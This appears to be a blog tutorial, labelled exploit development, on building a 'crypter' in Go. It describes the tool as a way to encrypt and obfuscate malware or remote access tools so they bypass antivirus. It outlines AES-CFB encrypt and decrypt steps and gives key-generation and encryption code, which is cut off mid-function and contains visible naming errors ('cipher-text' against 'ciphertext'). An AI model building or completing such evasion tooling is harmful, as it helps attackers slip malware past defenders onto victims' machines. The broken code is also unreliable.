[ExpDev] Custom Go Crypter

What is Crypter?

A crypter is a software that can encrypt, obfuscate and manipulate malware or a RAT (Remote Access Tool) tool to potentially bypass security products such as anti-viruses.

Encryption Process

For creating a simple crpyter, I will be using the following process:

• Generate a key with random characters & seed (32 characters hard-coded as of now)
• AES Encrypt #1 — Initialize the state array with the block data using the key
• AES Encrypt #2 — Generate IV (Initialization Vector) using block size + length of shellcode
• AES Encrypt #3 — Run the encryption process using the block and IV
• Base64 encode the results

Decryption Process

• Base64 decode the results
• AES Decrypt #1 — Initialize the state array with the block data using the key
• AES Decrypt #2 — Check if length IV is equal to the block size
• AES Decrypt #3 — Run the decryption process using the block and IV
• Return the decrypted string

I chose Go programming language to create the crypter.

Generate Key Code

// Random Key Generator (128 bit)
var chars = []rune("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz")
func randKeyGen(n int) string {
	charSet := make([]rune, n)
	for i := range charSet {
		charSet[i] = chars[math.Intn(len(chars))]
	}
	return string(charSet)
}

Encryption Code

// Encrypt: Original Text --> Add IV --> Encrypt with Key --> Base64 Encode
func Encrypt(key []byte, text []byte) string {
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	// Creating IV
	cipher-text := make([]byte, aes.BlockSize+len(text))
	iv := ciphertext[:aes.BlockSize]
	if _, err := io.ReadFull(rand.Reader, iv); err != nil {
		panic(err)
	}
	// Encrpytion Process
	stream := cipher.NewCFBEncrypter(block, iv)
	stream.XORKeyStream(ciphertext[aes.BlockSize:], text)